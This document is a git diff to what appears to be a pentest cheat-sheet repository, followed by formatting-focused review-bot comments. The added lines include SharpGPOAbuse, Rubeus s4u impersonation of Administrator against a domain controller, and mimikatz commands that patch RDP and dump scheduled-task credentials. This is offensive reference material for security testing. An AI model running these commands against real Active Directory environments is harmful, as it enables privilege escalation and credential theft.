diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md index 489fcd1..b6539e7 100644 --- a/Methodology and Resources/Active Directory Attack.md +++ b/Methodology and Resources/Active Directory Attack.md @@ -407,6 +407,11 @@ Get-NetGPOGroup ### Exploit Group Policy Objects GPO ```powershell +# Build and configure SharpGPOAbuse +git clone https://github.com/FSecureLABS/SharpGPOAbuse +Install-Package CommandLineParser -Version 1.9.3.15 +ILMerge.exe /out:C:\SharpGPOAbuse.exe C:\Release\SharpGPOAbuse.exe C:\Release\CommandLine.dll + # Adding User Rights SharpGPOAbuse.exe --AddUserRights --UserRights "SeTakeOwnershipPrivilege,SeRemoteInteractiveLogonRight" --UserAccount bob.smith --GPOName "Vulnerable GPO" @@ -1250,7 +1255,9 @@ Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation [*] Saving ticket in Administrator.ccache # Exploit with Rubeus -$ rubeus s4u /user:user_for_delegation /rc4:user_pwd_hash /impersonateuser:user_to_impersonate /domain:domain.com /dc:dc01.domain.com /msdsspn:cifs/srv01.domain.com /ptt +$ ./Rubeus.exe s4u /user:user_for_delegation /rc4:user_pwd_hash /impersonateuser:user_to_impersonate /domain:domain.com /dc:dc01.domain.com /msdsspn:cifs/srv01.domain.com /ptt +$ ./Rubeus.exe s4u /user:MACHINE$ /rc4:MACHINE_PWD_HASH /impersonateuser:Administrator /msdsspn:"cifs/dc.domain.com" /ptt +$ dir \\dc.domain.com\c$ ``` diff --git a/Methodology and Resources/Windows - Mimikatz.md b/Methodology and Resources/Windows - Mimikatz.md index ff34988..46682b9 100644 --- a/Methodology and Resources/Windows - Mimikatz.md +++ b/Methodology and Resources/Windows - Mimikatz.md 
@@ -2,15 +2,16 @@ ## Summary -* [Mimikatz - Execute commands](#) -* [Mimikatz - Extract passwords](#) -* [Mimikatz - Mini Dump](#) -* [Mimikatz - Golden ticket](#) -* [Mimikatz - Skeleton key](#) -* [Mimikatz - RDP session takeover](#) -* [Mimikatz - Credential Manager & DPAPI](#) -* [Mimikatz - Commands list](#) -* [Mimikatz - Powershell version](#) +* [Mimikatz - Execute commands](#mimikatz---execute-commands) +* [Mimikatz - Extract passwords](#mimikatz---extract-passwords) +* [Mimikatz - Mini Dump](#mimikatz---mini-dump) +* [Mimikatz - Pass The Hash](#mimikatz---pass-the-hash) +* [Mimikatz - Golden ticket](#mimikatz---golden-ticket) +* [Mimikatz - Skeleton key](#mimikatz---skeleton-key) +* [Mimikatz - RDP session takeover](#mimikatz---rdp-session-takeover) +* [Mimikatz - Credential Manager & DPAPI](#mimikatz---credential-manager--dpapi) +* [Mimikatz - Commands list](#mimikatz---commands-list) +* [Mimikatz - Powershell version](#mimikatz---powershell-version) * [References](#references) ![Data in memory](http://adsecurity.org/wp-content/uploads/2014/11/Delpy-CredentialDataChart.png) @@ -109,6 +110,8 @@ rdesktop 10.0.0.2:3389 -u test -p mimikatz -d pentestlab ## Mimikatz - RDP session takeover +Use `ts::multirdp` to patch the RDP service to allow more than two users. + Run tscon.exe as the SYSTEM user, you can connect to any session without a password. ```powershell @@ -125,6 +128,8 @@ net start sesshijack ``` + + ## Mimikatz - Credential Manager & DPAPI ```powershell 
@@ -141,6 +146,21 @@ $ mimikatz !sekurlsa::dpapi $ mimikatz dpapi::cred /in:C:\Users\\AppData\Local\Microsoft\Credentials\2647629F5AA74CD934ECD2F88D64ECD0 /masterkey:95664450d90eb2ce9a8b1933f823b90510b61374180ed5063043273940f50e728fe7871169c87a0bba5e0c470d91d21016311727bce2eff9c97445d444b6a17b ``` +Task Scheduled credentials + +```powershell +mimikatz(commandline) # vault::cred /patch +TargetName : Domain:batch=TaskScheduler:Task:{CF3ABC3E-4B17-ABCD-0003-A1BA192CDD0B} / +UserName : DOMAIN\user +Comment : +Type : 2 - domain_password +Persist : 2 - local_machine +Flags : 00004004 +Credential : XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX +Attributes : 0 +``` + + ## Mimikatz - Commands list | Command |Definition| diff --git a/SQL Injection/MSSQL Injection.md b/SQL Injection/MSSQL Injection.md index 2be3918..35836c8 100644 --- a/SQL Injection/MSSQL Injection.md +++ b/SQL Injection/MSSQL Injection.md @@ -239,4 +239,5 @@ EXECUTE('EXECUTE(''sp_addsrvrolemember ''''hacker'''' , ''''sysadmin'''' '') AT * [Sqlinjectionwiki - MSSQL](http://www.sqlinjectionwiki.com/categories/1/mssql-sql-injection-cheat-sheet/) * [Error Based - SQL Injection ](https://github.com/incredibleindishell/exploit-code-by-me/blob/master/MSSQL%20Error-Based%20SQL%20Injection%20Order%20by%20clause/Error%20based%20SQL%20Injection%20in%20“Order%20By”%20clause%20(MSSQL).pdf) * [MSSQL Trusted Links - HackTricks.xyz](https://book.hacktricks.xyz/windows/active-directory-methodology/mssql-trusted-links) -* [SQL Server – Link… Link… Link… and Shell: How to Hack Database Links in SQL Server! - Antti Rantasaari - June 6th, 2013](https://blog.netspi.com/how-to-hack-database-links-in-sql-server/) \ No newline at end of file +* [SQL Server – Link… Link… Link… and Shell: How to Hack Database Links in SQL Server! - Antti Rantasaari - June 6th, 2013](https://blog.netspi.com/how-to-hack-database-links-in-sql-server/) +* [DAFT: Database Audit Framework & Toolkit - NetSPI](https://github.com/NetSPI/DAFT) \ No newline at end of file 
diff --git a/XSS Injection/README.md b/XSS Injection/README.md index 23db803..7b28ee9 100644 --- a/XSS Injection/README.md +++ b/XSS Injection/README.md @@ -10,7 +10,7 @@ Cross-site scripting (XSS) is a type of computer security vulnerability typicall - [Javascript keylogger](#javascript-keylogger) - [Other ways](#other-ways) - [Identify an XSS endpoint](#identify-an-xss-endpoint) -- [XSS in HTML/Applications](#xss-in-llapplications) +- [XSS in HTML/Applications](#xss-in-htmlapplications) - [XSS in wrappers javascript and data URI](#xss-in-wrappers-javascript-and-data-uri) - [XSS in files (XML/SVG/CSS/Flash/Markdown)](#xss-in-files) - [XSS in PostMessage](#xss-in-postmessage)
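Review bot: in the `Active Directory Attack.md` hunk under "Exploit Group Policy Objects GPO", the new build steps jump from `git clone https://github.com/FSecureLABS/SharpGPOAbuse` and `Install-Package CommandLineParser -Version 1.9.3.15` straight to `ILMerge.exe /out:C:\SharpGPOAbuse.exe C:\Release\SharpGPOAbuse.exe C:\Release\CommandLine.dll`, but nothing in the block produces `C:\Release\`; either add the compile step that generates those files or say in the `# Build and configure SharpGPOAbuse` comment that the project must be built first. The comment should also say which `Install-Package` is meant (the Visual Studio Package Manager Console's or PowerShell's PackageManagement cmdlet), since the two resolve packages differently and the block is fenced as `powershell`.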
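Review bot: in the Rubeus hunk, the two `./Rubeus.exe s4u` lines use different placeholder conventions (`user_for_delegation` / `user_pwd_hash` versus `MACHINE$` / `MACHINE_PWD_HASH`), and the second line drops the `/domain` and `/dc` switches without comment; pick one placeholder style and add a short comment stating what the second invocation illustrates and why those switches are absent. The `$ ` prompt before `./Rubeus.exe` and `dir \\dc.domain.com\c$` also reads as a Unix shell for what are Windows commands; if that is the file's convention it is fine, otherwise drop the prompt.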
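Review bot: in the `Windows - Mimikatz.md` summary hunk, the added entry `* [Mimikatz - Pass The Hash](#mimikatz---pass-the-hash)` links to a heading that no hunk in this patch adds; confirm a `## Mimikatz - Pass The Hash` section already exists in the file, otherwise the new link dangles. The other anchors follow GitHub's slug rule (lowercase, punctuation dropped, spaces to hyphens), including `#mimikatz---credential-manager--dpapi`, where the removed `&` correctly leaves a double hyphen.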
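Review bot: in the RDP session takeover hunk, the added sentence `Use \`ts::multirdp\` to patch the RDP service to allow more than two users.` introduces a module command without saying it is a mimikatz command, while the paragraph that follows is about `tscon.exe`; add that attribution (or move the line into the fenced block where the file keeps its commands) so the reader does not conflate the two tools.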
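Review bot: the `@@ -125,6 +128,8 @@` hunk only adds two blank lines before `## Mimikatz - Credential Manager & DPAPI`; that is whitespace noise, since one blank line before a heading is enough, so drop the extra line or the hunk entirely.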
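Review bot: in the `@@ -141,6 +146,21 @@` hunk, `Task Scheduled credentials` is a bare paragraph, whereas the file introduces its sections with `##` headings; make it a heading, and "Scheduled Task credentials" reads better and matches the `TargetName : Domain:batch=TaskScheduler:Task:{...}` line in the output. Fencing mimikatz output as `powershell` follows the file's existing convention, but the `Credential : XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX` line deserves a one-word note that the value is masked, so nobody reads the X's as literal output.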
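Review bot: the `MSSQL Injection.md` hunk still ends with `\ No newline at end of file` after the new `* [DAFT: Database Audit Framework & Toolkit - NetSPI](https://github.com/NetSPI/DAFT)` entry; terminate the file with a newline so the next reference added does not produce another spurious diff against the last line.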
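Review bot: the `#xss-in-llapplications` to `#xss-in-htmlapplications` change in the `XSS Injection/README.md` hunk is the right slug for "XSS in HTML/Applications" (GitHub drops the `/`); while here, the neighbouring `[XSS in files (XML/SVG/CSS/Flash/Markdown)](#xss-in-files)` entry's anchor is shorter than its link text implies, so check that the target heading's slug really is `xss-in-files` rather than one that carries the parenthetical.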